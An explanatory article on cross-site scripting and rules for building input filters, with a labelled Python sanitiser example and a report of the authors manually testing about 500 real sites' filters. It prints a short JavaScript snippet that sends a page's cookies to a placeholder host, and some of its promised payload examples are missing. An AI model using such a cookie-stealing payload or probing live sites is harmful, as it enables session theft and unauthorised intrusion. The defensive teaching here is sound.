What is an XSS attack?
This is a type of attack that injects malicious code into a web system, forcing it to display modified data, replace links (visible or hidden) or show the attacker's own advertisements on the affected resource.
There are two categories of attack:
Passive – these require the direct participation of the target. The point is to force the victim to follow a malicious link so that the "malicious code" executes. This type of attack is harder to carry out, because it requires not only technical but also psychological knowledge.
Active – a type of attack in which a hacker tries to find a vulnerability in a website's filter. How is such an attack carried out? Very simply: a request is built from a combination of tags and symbols so that the site accepts it and executes the command. As soon as a hole is found, "malicious code" can be inserted into the request which will, for example, steal cookies and send them to a location convenient for the attacker. Here is an example of a script that steals cookies from a website:
Img = new Image();
Img.src = "http://site.gif?" + document.cookie;
You usually have to work hard to find a hole in a site's filter, as most filters are robust enough. But people write them, and people make mistakes.
Where and why do such vulnerabilities, which can lead to catastrophic consequences, arise? It all comes down to the attentiveness and knowledge of people. Developers must write correct code, so in this section we discuss the minimum security rules for writing websites.
We have already described how the attack works, but we will repeat it: the whole point of an XSS attack is to find a hole in the filter in order to bypass it.
1. One of the very first and most basic rules for a developer is to use some filter, even the most minimal one.
In our study of sites, almost all were protected, but there were still some that did not filter the received data at all. This was mainly found on sites written in PHP. Python frameworks such as Flask or Django, by contrast, already have built-in minimal filters; it only remains to strengthen them.
2. Filtering symbols and nested structures.
3. The filter should take into account all possible combinations of characters.
One of our favourite XSS vulnerability checks uses opening and closing parentheses.
We write a command with an arbitrary number of brackets. The filter sees this and tries to close them, but the nested code is still executed. With this query we not only test the filter against different numbers of parentheses, but also see how it reacts to different characters, whether it blocks or passes them. Note the construction at the end of the example: the script is passed as an argument in parentheses. It is a fun way to test your filter. In our study, many sites did not filter this type of attack and were at risk.
4. Using tags.
Suppose you are filtering both symbols and nested constructs. There is another vulnerability, associated with the img, bb and url tags. These tags have many parameters, including dynsrc and lowsrc, which can contain JavaScript. These tags must be filtered without fail. If you are not going to use pictures on the site, it is better to disable them altogether.
Unfortunately, simple tag filtering is not enough; you also need to take into account that an attacker may place additional characters inside the tag, and these must be filtered as well.
When building a filter, one must first of all consider encoding attacks. There are many encoder programs that encode an attack so that the filter cannot recognise it. Therefore the filter must decode the request before the program executes it.
Here is an example of encoded code:
Encoding is useful not only for bypassing the filter, but also for social engineering, that is, deceiving people. The encoded code can be sent as a link; it is unlikely that anyone will check it, which brings us to the next point.
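Rules 1 to 5 above describe what a filter has to handle: nested constructs, tag attributes such as dynsrc and lowsrc, and encoded input that must be decoded before it is checked. The following is an added example, not code from the article, showing a one-pass blacklist filter next to a hardened decode-then-escape approach in Python (stdlib only); the function names and payloads are constructed for illustration.

```python
# Added example (not from the original article): a one-pass blacklist
# filter of the kind the article warns about, beside a hardened approach
# that decodes first and then escapes. Payloads and names are constructed.
import html
import re
from urllib.parse import unquote

def naive_filter(s: str) -> str:
    """Single pass that strips <script> tags by name. A nested construct
    such as <scr<script>ipt> survives: removing the inner tag rebuilds the
    outer one, and an encoded payload is never matched at all."""
    return re.sub(r"<\s*/?\s*script[^>]*>", "", s, flags=re.IGNORECASE)

def normalise(s: str) -> str:
    """Undo the encodings an encoder tool applies (URL and HTML entity
    encoding), repeating until nothing changes, so the filter sees the
    same characters the browser would."""
    prev = None
    while prev != s:
        prev = s
        s = html.unescape(unquote(s))
    return s

# Allow-list for <img>: legacy attributes such as dynsrc/lowsrc and event
# handlers are dropped because they are not listed, not because we named them.
ALLOWED_IMG_ATTRS = {"src", "alt", "width", "height"}

def sanitise_img_attrs(attrs: dict) -> dict:
    """Keep only allow-listed attributes and only http(s) image sources."""
    clean = {k.lower(): v for k, v in attrs.items()
             if k.lower() in ALLOWED_IMG_ATTRS}
    if not re.match(r"^https?://", normalise(clean.get("src", "")), re.I):
        clean.pop("src", None)
    return clean

def render_untrusted(s: str) -> str:
    """Hardened path for text placed in the HTML body: decode, then escape
    every special character, so no combination of brackets, quotes or
    parentheses can open a tag or attribute."""
    return html.escape(normalise(s), quote=True)

if __name__ == "__main__":
    nested = "<scr<script>ipt>alert(1)</script>"
    print(naive_filter(nested))      # the inner tag is removed and the outer one is rebuilt
    print(render_untrusted(nested))  # inert text, safe to place in the page body
```

The escaping shown here is for the HTML body context only; input placed into attributes, URLs or scripts needs the encoding appropriate to that context.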
6. Social engineering.
It is not enough to write a filter resistant to attacks; it is also necessary to hold periodic lectures for employees about the rules for using the Internet and to talk about the possible tricks used by hackers.
A couple of basic rules: never open suspicious links, and check encoded ones, especially if you are a hosting or network administrator.
How seriously do developers take the security of their web applications? Our team decided to find out. As part of our research, we examined about 500 sites for security errors. A lot of time was spent collecting, processing and structuring the information. All checks were carried out manually, because we did not find a suitable tool, and there was not enough time and knowledge to write our own software. But now that we have the experience, next time we will do exactly that.
It is worth mentioning that we only checked the filters; this does not violate the legislation of the Russian Federation (Articles 272-274 of the Criminal Code) and carries no penalty.
We were able to bypass about 11% of them with only average knowledge in this area. This is a serious failing on the part of the developers, which can do a lot of harm to a project, because users' personal data comes under attack. According to the law (Article 13.11 of the Administrative Code, part 6), all sites must ensure the safety of personal data when storing material media and exclude unauthorised access to it. If this results in illegal access to personal data (destruction, modification, copying, blocking, etc.), a fine of 700 to 50,000 rubles is imposed.
Most sites are well protected from attacks, which is good news for us as users. The results of the study are shown in the diagram below.